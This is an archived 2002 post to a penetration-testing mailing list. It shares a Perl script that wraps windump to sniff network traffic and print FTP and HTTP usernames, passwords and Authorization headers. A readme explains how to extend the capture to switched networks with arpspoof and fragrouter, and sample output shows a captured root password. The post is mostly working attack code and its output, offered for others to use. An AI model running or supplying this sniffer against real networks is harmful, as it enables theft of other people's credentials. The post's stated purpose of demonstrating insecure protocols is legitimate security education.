Perl Script wrapper for Windump

From: Susan Chan Lee (susan.lee@securityassoc.com)
Date: 03/01/02


Date: Thu, 28 Feb 16:36:05 2002 +0000
From: "Susan Chan Lee" <susan.lee@securityassoc.com>
To: pen-test@securityfocus.com

Hi
 
Just thought this Perl script may be useful to you all.
 
This script is essentially a wrapper around windump and demonstrates
the weaknesses of the FTP and HTTP protocols. It will cleanly capture
and display all FTP and HTTP usernames and passwords and has been
configured for Proxy support (port 8080 and 8088 - modify script for
your specific requirements). It is most effective on hubbed networks.
To use on switched networks use arpspoof and fragrouter or something
similar for best results.
 
Thanks
 
Susan Chan Lee
Security Associates - Singapore
 
#!/usr/bin/perl
# Author: Susan Lee
# email: susan.lee@securityassoc.com
# File: sort.pl
# Usage: perl sort.pl
 
$LIMIT = shift || 25000;
 
$|=1;
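open (STDIN,"windump -lnx -s 1024 dst port 80 or 8080 or 8088 or 21 |");
while (<>) {
    # A non-indented line is a packet header: report matches from the
    # previous packet's payload, then reset state for the new packet.
    if (/^\S/) {
        last unless $LIMIT--;
        while ($packet=~/(USER|PASS|GET|POST|WWW-Authenticate|Authorization).+/g) {
            print "$client -> $host\t$&\n";
        }
        undef $client; undef $host; undef $packet;
        # Only track packets with the PSH flag and a non-zero payload length.
        ($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
            if /P \d+:\d+\((\d+)\)/ && $1 > 0;
    }
    next unless $client && $host;
    # Hex dump line: strip leading whitespace, decode hex pairs to
    # characters, and keep only \x1F-\x7E plus CR and LF.
    s/\s+//;
    s/([0-9a-f]{2})\s?/chr(hex($1))/eg;
    tr/\x1F-\x7E\r\n//cd;
    $packet .= $_;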
}
 
# End of Script
 
Readme File:
 
Tested successfully using ActiveState Perl
(http://www.activestate.com).
This script is essentially a wrapper around windump and demonstrates
the weaknesses of the FTP and HTTP protocols. It will cleanly capture
and display all FTP and HTTP usernames and passwords and has been
configured for Proxy support (port 8080 and 8088 - modify script for
your specific requirements). It is most effective on hubbed networks.
To use on switched networks use arpspoof and fragrouter or something
similar for best results.
 
Sort.pl builds on a script written by Lincoln Stein. This script is a
port to Windows and makes some other modifications.
 
This script is really a wrap around the Windump program, which needs
to be installed and configured on your system for this script to work
(http://netgroup-serv.polito.it/windump/). sort.pl assumes windump is
in your system path. If your system has multiple interfaces
(including dial-up interfaces), then you'll need to tell windump
which interface to listen on via the -i X command, where X is
the number of the interface, and edit the script appropriately (line
8). Use the windump -D command to see all interfaces on your system.
 
An example is given below:
 
C:\Temp\ps>perl sort.pl
windump: listening on\Device\Packet_{1443C46F-E2B6-404F-9588-BB555B2E3764}
172.1.3.130 -> 172.1.4.231 USER root
172.1.3.130 -> 172.1.4.231 PASS london
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/ps.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/spacer.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/go.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/search.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/bg_area2.gif HTTP/1.1
172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/top.gif HTTP/1.1
493 packets received by filter
0 packets dropped by kernel
 

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/


